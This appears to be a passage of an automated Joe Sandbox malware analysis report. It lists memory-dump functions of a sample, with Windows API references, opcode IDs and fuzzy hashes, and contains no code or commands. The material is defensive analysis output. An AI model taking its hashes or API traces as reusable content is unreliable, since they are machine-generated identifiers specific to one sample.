                                                    • Instruction Fuzzy Hash: 44B19539905228CFCB68DB64D88C79DB7B2BF4A306F2045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: fa31637d8554ea0007b3cdc4b3c47958b83de4a4c2bd7e40a8de7db464bbbbc9
                                                    • Instruction ID: c6fc8a7436ba23ddd5b86f51e0ec019b303fd5ea595120ac3a95b5b657efc947
                                                    • Opcode Fuzzy Hash: fa31637d8554ea0007b3cdc4b3c47958b83de4a4c2bd7e40a8de7db464bbbbc9
                                                    • Instruction Fuzzy Hash: 57B18539905228CFCB68DB64D88C69DB7B2BF4A306F2045D9D54AA3350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: e825617f1d03b44f6aacadf02106fa3553959597b65788e2eb3c0b2972b4da89
                                                    • Instruction ID: f4b9ef0ec1d9e40bde2669ffcfede0e8cc42683ca2c036b120a2bd38277da72f
                                                    • Opcode Fuzzy Hash: e825617f1d03b44f6aacadf02106fa3553959597b65788e2eb3c0b2972b4da89
                                                    • Instruction Fuzzy Hash: 6BA19639906228CFDB68DB64D88C79DB7B2BF4A306F2045D9D54A93350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 426764634eb69ac666f0bb9896d5be1be600055294c5755a39d7e03db9996091
                                                    • Instruction ID: baab79da7c9cad1669d0afa2971e489004d161ca7dc8e3b8043dedcf07205afc
                                                    • Opcode Fuzzy Hash: 426764634eb69ac666f0bb9896d5be1be600055294c5755a39d7e03db9996091
                                                    • Instruction Fuzzy Hash: DFA19539906228CFCB68DB64D88C79DB7B2BF4A306F2045D9D54A93350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 39f53766e3ed72c4a07ad43c827959a683d870618983f3f45be1d5aca822df52
                                                    • Instruction ID: d658aec027e4a662ab61e7ab855d25d0279e51f97e73f17beddbb8a8c1746fb6
                                                    • Opcode Fuzzy Hash: 39f53766e3ed72c4a07ad43c827959a683d870618983f3f45be1d5aca822df52
                                                    • Instruction Fuzzy Hash: 8C918539905228CFCB64DB65D88C79DB7B2BF4A305F2045D9D54A93350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 8a8500c1c29a392e6f1c00de6b11e00b63fa9d05ae5459d01aeef6e464b3a3e3
                                                    • Instruction ID: 2c1b5059c62fbdc3b055e4663f505ca15c100e23ce7c4f7a3aaad7611220565e
                                                    • Opcode Fuzzy Hash: 8a8500c1c29a392e6f1c00de6b11e00b63fa9d05ae5459d01aeef6e464b3a3e3
                                                    • Instruction Fuzzy Hash: 44918539906228CFCB64DB65D88C6ADB7B2BF4A305F2045D9D54A93350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 71d295388c5b61aa8853a84a613dfd0ff554966c05b0afb45c4dbb2a5145e38f
                                                    • Instruction ID: c553a94c9f2d31e826000908d8369eb4c716421005a2b92415332f083de6b54c
                                                    • Opcode Fuzzy Hash: 71d295388c5b61aa8853a84a613dfd0ff554966c05b0afb45c4dbb2a5145e38f
                                                    • Instruction Fuzzy Hash: 38918439906228CFDB68DB64D88C79DB7B2BF4A305F2045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 0d91de160523b022bdc5fddf4ae0bd3c4b32eb91bb83fbf33d5557399b693b3b
                                                    • Instruction ID: 1f42b5850f23fad39fad2c6ba306806c838edaefc05ffa7d55e2bfd56b0007e8
                                                    • Opcode Fuzzy Hash: 0d91de160523b022bdc5fddf4ae0bd3c4b32eb91bb83fbf33d5557399b693b3b
                                                    • Instruction Fuzzy Hash: F6819439906228CFCB64DB64D88D79DB7B2BF4A305F2045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 9b8dc0efaa2e709f2cb19e568050062c0bdb96027545610b7c53dc9cb8ab839c
                                                    • Instruction ID: a769a1e7b454a60fb4f7ef2dc9273fa500961a199b277e8927a6dd9abf790d95
                                                    • Opcode Fuzzy Hash: 9b8dc0efaa2e709f2cb19e568050062c0bdb96027545610b7c53dc9cb8ab839c
                                                    • Instruction Fuzzy Hash: E2819539906228CFCB64DB64D88CB9DB7B2BF4A305F1045D9D54AA3350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: ba7aa309c6d0b22a8a70fcf2b6c91f3109f5574c671e7570046b03c40d753423
                                                    • Instruction ID: 3a1bec06a0745dcc97f36c867f3fd8b6f41d68b1ab86894687567e680db610e7
                                                    • Opcode Fuzzy Hash: ba7aa309c6d0b22a8a70fcf2b6c91f3109f5574c671e7570046b03c40d753423
                                                    • Instruction Fuzzy Hash: 44718439906228CFCB64DF64D88D69DB7B2BF4A306F1045D9D54AA2350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: cafcc96c6b74ba2aa9cea8499440e66a3578ec1d63adbb58f48bf2232e911124
                                                    • Instruction ID: 195c3e0f05461b80d2d62636ca1d0eee3bb9e7bc15db0e5cba2ce61bde3df0b5
                                                    • Opcode Fuzzy Hash: cafcc96c6b74ba2aa9cea8499440e66a3578ec1d63adbb58f48bf2232e911124
                                                    • Instruction Fuzzy Hash: 3C719639906228CFDB64DB64D88D69CB7B2BF46305F1045D9D54AA3350CB356E81CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.551411606.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6950000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f53700b176b93557c4c9938905ceafbb6ab19d49005a2c6e542a662d1cc645ff
                                                    • Instruction ID: 98e9599a2352444cb59c24e5457ddf14a6defb3594cc9d296849c2cc63124dbd
                                                    • Opcode Fuzzy Hash: f53700b176b93557c4c9938905ceafbb6ab19d49005a2c6e542a662d1cc645ff
                                                    • Instruction Fuzzy Hash: 80417430B102059FCB04EBB4D889EAEB7B6BF48304F158929E912DB755EF35DD058BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: f313bdb2703aa8b263d801755d05df4e16242d5fce9fcbd84f06cd4975f981c2
                                                    • Instruction ID: 6ed9a98c7c05ee1fe1e8fbf9a2853110a70b95ed54155f8325d7201a966c1b47
                                                    • Opcode Fuzzy Hash: f313bdb2703aa8b263d801755d05df4e16242d5fce9fcbd84f06cd4975f981c2
                                                    • Instruction Fuzzy Hash: C1619639902228CFCB64DF64D88D69DB7B2BF4A306F2045D9D54A93350CB356E85CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 8f11a0de74617334b1fefb0c1602c3663cf31099a0f0bb4ce452fcd20aef734c
                                                    • Instruction ID: 15ab3d907b217fb8a5d0d150cd90844977c13ea071781cd97cb26daac6b48963
                                                    • Opcode Fuzzy Hash: 8f11a0de74617334b1fefb0c1602c3663cf31099a0f0bb4ce452fcd20aef734c
                                                    • Instruction Fuzzy Hash: 43518639901228CFDB64DF64D88DA9DB7B2BF4A306F1045D9D54A93350CB356E81CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: de5be569b628cd9f5f6534c66d3ebe01fe0e9a70d0a0cc2b983b775095d816ab
                                                    • Instruction ID: 67324a15d72a4775ae7e7b0294771286ff9416d029c33e6e66ba07fcc4a5adde
                                                    • Opcode Fuzzy Hash: de5be569b628cd9f5f6534c66d3ebe01fe0e9a70d0a0cc2b983b775095d816ab
                                                    • Instruction Fuzzy Hash: EE519639902228CFCB64DB65D88DB9DB7B2BF46305F2045D9E54A93350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A1E162
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 68dc5e080693b526cf475983ebb726a0e4b02e7f49474f939a928f58e6a4c9d9
                                                    • Instruction ID: 314c96f4ce51bbb3e9db61441542bae68132e650ef7978b8579b39da9c25bca0
                                                    • Opcode Fuzzy Hash: 68dc5e080693b526cf475983ebb726a0e4b02e7f49474f939a928f58e6a4c9d9
                                                    • Instruction Fuzzy Hash: EC51BEB1D103499FDF14CF99C884ADEBBB5BF88314F24812AE819AB210D775A885CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: cd573f64b257b867dd8c0d325c7caed6a568aa2314b8adee20c499ebb3915936
                                                    • Instruction ID: 1abf9c05a0b0385a938adfb3e181354550677d47f14033aca7f35528d6226ef8
                                                    • Opcode Fuzzy Hash: cd573f64b257b867dd8c0d325c7caed6a568aa2314b8adee20c499ebb3915936
                                                    • Instruction Fuzzy Hash: 3D519739901228CFCB64DB64D88DB9DB7B2BF46305F2045D9E54A93350CB356E81CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 69b0d211fc831eeff38953e4127f9a9f9dc22934bf3a7e7a3b0780c7a66d2afb
                                                    • Instruction ID: 951dd99d6d02ce9a0ae3adf2f48a02421c06041cbcb7226aff71f11b96f55244
                                                    • Opcode Fuzzy Hash: 69b0d211fc831eeff38953e4127f9a9f9dc22934bf3a7e7a3b0780c7a66d2afb
                                                    • Instruction Fuzzy Hash: 5E519639901228CFCB64DB64D88DB9DB7B2BF46305F2045D9E54AA3350CB356E81CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 3a97256f0f89ff3d0b103f3a1fafcbfa5b3076b3d292347d44234919f49d5451
                                                    • Instruction ID: 06d9032e2206c3cc13008406e52886d27f190def18768d72d7c7fe1ce4ededd6
                                                    • Opcode Fuzzy Hash: 3a97256f0f89ff3d0b103f3a1fafcbfa5b3076b3d292347d44234919f49d5451
                                                    • Instruction Fuzzy Hash: 1A419539901228CFCB64DB65D88DA9DB7B2BF4A305F2045E9E54AA3350CB356E81CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C98E10
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 97b693ee1c36356dcab1c0eb50d3bb30449d1e8960d491f8fd4999cf69c95ad4
                                                    • Instruction ID: 137764c83dfdf184296cba28c9c1ce6d7fe17e2970db3c0a530730b38aaf2db9
                                                    • Opcode Fuzzy Hash: 97b693ee1c36356dcab1c0eb50d3bb30449d1e8960d491f8fd4999cf69c95ad4
                                                    • Instruction Fuzzy Hash: FB419439901228CFCB64DB64D88DA9DB7B2BF4A305F2045E9E54AA3350CB356E81CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 00F6D8A2
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: d53e3135d37e1494bacb85432ce501cb08a864799c066052cbb23f05a7d14e55
                                                    • Instruction ID: 550653483b4548b8577311589c954b22865a4a2675f8d73a10ebcbe89498979d
                                                    • Opcode Fuzzy Hash: d53e3135d37e1494bacb85432ce501cb08a864799c066052cbb23f05a7d14e55
                                                    • Instruction Fuzzy Hash: 613104B0E102599FDB14CFA9C889B9DBBF1FB49314F14812EE815A7380D7749845DF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 00F6D8A2
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: a31d21a1d027e64bfc45cfaeefe03a29d8d7f15197e900ee277a1621696d50ff
                                                    • Instruction ID: e9d52c828388c6fcbcc07c00a8d2c14b11f3afedb77f79beefb6d7a02f54bf9a
                                                    • Opcode Fuzzy Hash: a31d21a1d027e64bfc45cfaeefe03a29d8d7f15197e900ee277a1621696d50ff
                                                    • Instruction Fuzzy Hash: BD4113B0E102598FDB14CFA9C889B9EBBB1FB48314F14812EE815A7380D7759845DF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06A1CD61
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID:
                                                    • API String ID: 3660427363-0
                                                    • Opcode ID: 17785cd7d7f091373ee4f5c147be721689df3c4b4bb90b1d837b8afcdc5b30ed
                                                    • Instruction ID: 8bc4da435c9c0aed69aeb65b8e4b333d0acac4462a3e66abd5d66c964a90b143
                                                    • Opcode Fuzzy Hash: 17785cd7d7f091373ee4f5c147be721689df3c4b4bb90b1d837b8afcdc5b30ed
                                                    • Instruction Fuzzy Hash: CC41FFB1D402589FCB60DF9AC884ADEBFF5BF48714F14802AE81AAB300D774A905CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 06A1CAA4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID:
                                                    • API String ID: 71445658-0
                                                    • Opcode ID: 7ccb92042fd6a04f365fed1f53393a807032807dc637bea9cec7183252a8c730
                                                    • Instruction ID: cd9cb9cfd220ddebe5ca6be278dedae4434439a09dae3f2cbfe574a5ac74d107
                                                    • Opcode Fuzzy Hash: 7ccb92042fd6a04f365fed1f53393a807032807dc637bea9cec7183252a8c730
                                                    • Instruction Fuzzy Hash: BD3111B0D012499FDB10DF99C584A9EFBF5BF48314F28816EE409AB301C775A945CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A1FCC7
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: f19c814f2c3dda44a08516b844048eeda214456a3412d6ed4839f0e4a1c28ec0
                                                    • Instruction ID: a84b892c8bca22f48dabbd541b41c2bffe43e83a4a0aece79d5ed98190c5329f
                                                    • Opcode Fuzzy Hash: f19c814f2c3dda44a08516b844048eeda214456a3412d6ed4839f0e4a1c28ec0
                                                    • Instruction Fuzzy Hash: 9B21DFB5D002499FDB10CFAAD884ADEBBF8FB48324F14841AE915B7310D379A955CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 00F6595A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: 166fe3902a43171645be5a65adcce15708a994074fce89f8f9f2596c9b57ec39
                                                    • Instruction ID: 55a7c6395498183f54fb14bf2326824044e041e5fe977902f30224b3988de70b
                                                    • Opcode Fuzzy Hash: 166fe3902a43171645be5a65adcce15708a994074fce89f8f9f2596c9b57ec39
                                                    • Instruction Fuzzy Hash: B2216AB1905785CFDB10DFA8C94879ABBF0EB06328F19846AC445F3641C7395508CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 00F6595A
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: af83409ee570cddadd43d01dd2761970b59f585fff29051885f26b459ec1d49c
                                                    • Instruction ID: d1fc26bd961589e2566e3c9c35d109671980d7cadd51a08d05bfaebe19993df4
                                                    • Opcode Fuzzy Hash: af83409ee570cddadd43d01dd2761970b59f585fff29051885f26b459ec1d49c
                                                    • Instruction Fuzzy Hash: 9A1186B0900349CFEB10DFA9D848B9EBBF4EB49724F18842AD445B3600C738A948CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 00F60B06
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 6dc305a86ecdfa276abe6474456ca66b1af9073f96fefd9f4cd8c641d1c08390
                                                    • Instruction ID: b76e35f434e04c21a1e0c20c7bb9818b4f56ad22afa386a908ba184f27ebc156
                                                    • Opcode Fuzzy Hash: 6dc305a86ecdfa276abe6474456ca66b1af9073f96fefd9f4cd8c641d1c08390
                                                    • Instruction Fuzzy Hash: 502112B59002499FCF10CF9AC884BDEBBF8FB88324F248419E529A7210C775A955CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 78fc760b6e598f5bf1c65660cdeac89a12fff05dd0a245a72246ab18de498ea4
                                                    • Instruction ID: 6b0619a4ab0d3a696d7b80a5fa08b18bebcd75322a7c93c14efaba6d13f989df
                                                    • Opcode Fuzzy Hash: 78fc760b6e598f5bf1c65660cdeac89a12fff05dd0a245a72246ab18de498ea4
                                                    • Instruction Fuzzy Hash: 1D1113B48002498FCB10CF9AC484BDEBBF4EB89324F148459D529A7341C775A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 18b3693beaee6b4a13cb2c88a980c067596458b4e53a7305efeacd866631e827
                                                    • Instruction ID: 4fcafab85345dbbf922c4193598f3976db4e68f142213794ec8ba7cfa35b95fd
                                                    • Opcode Fuzzy Hash: 18b3693beaee6b4a13cb2c88a980c067596458b4e53a7305efeacd866631e827
                                                    • Instruction Fuzzy Hash: 5711F2B58002498FDB10CF9AC884BDEFBF4EB89328F14845AD529B7340C775A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.522332823.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
